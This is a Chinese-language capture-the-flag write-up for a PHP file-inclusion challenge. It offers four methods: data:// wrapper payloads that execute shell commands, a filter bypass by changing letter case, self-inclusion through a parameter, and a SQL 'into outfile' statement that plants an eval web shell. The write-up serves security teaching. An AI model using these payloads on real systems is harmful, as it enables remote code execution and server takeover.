攻防世界(Web_php_include)
题目叙述
题目场景如下:
属于文件包含漏洞
解决
方法一
0x00
通过代码审计可以知道,存在文件包含漏洞,并且对伪协议php://进行了过滤。
发现根目录下存在phpinfo
观察phpinfo发现如下:
这两个都为on
所以我们就可以使用data://伪协议
0x01
payload如下:
- ?page=data://text/plain,<?php system("ls")?>
- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4= #base64编码
- ?page=data:text/plain,<?php system("ls")?>
- ?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4= #base64编码
上面的payload就可以实现命令执行了
找了半天发现flag在fl4gisisish3r3.php文件中
使用如下payload就可以获取flag了
?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
使用该命令获取的flag被隐藏了,直接在web界面找不到,可以通过查看网页源代码查看
方法二
0x00
代码审计可知,存在文件包含漏洞。
0x01
这里我们借助了hello参数
hello接收到数据直接输出
所以就可以构造如下payload:
?page=http://127.0.0.1/index.php/?hello=<?php system("ls")?>
但是什么都没得到,具体什么情况我也不清楚,继续构造
?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>
此处也可以执行命令了
这次得到了如下结果:
然后可以用如下
?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>
得到flag
方法三
0x00
代码审计,可得存在文件包含漏洞,并且过滤php://伪协议,但是由代码可得我们可以进行绕过。
0x01
大小写绕过
?page=Php://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php
对得到的结果进行base64解码即可
方法四
0x00
扫描目录
得到如下结果
0x01
进入后台密码为空
查询是否可以写入shell
可以写入
sql执行如下语句
select "<?php eval(@$_POST['c']); ?>"into outfile '/tmp/shell.php'
连接
就可以获得shell,然后就可以去获取flag了。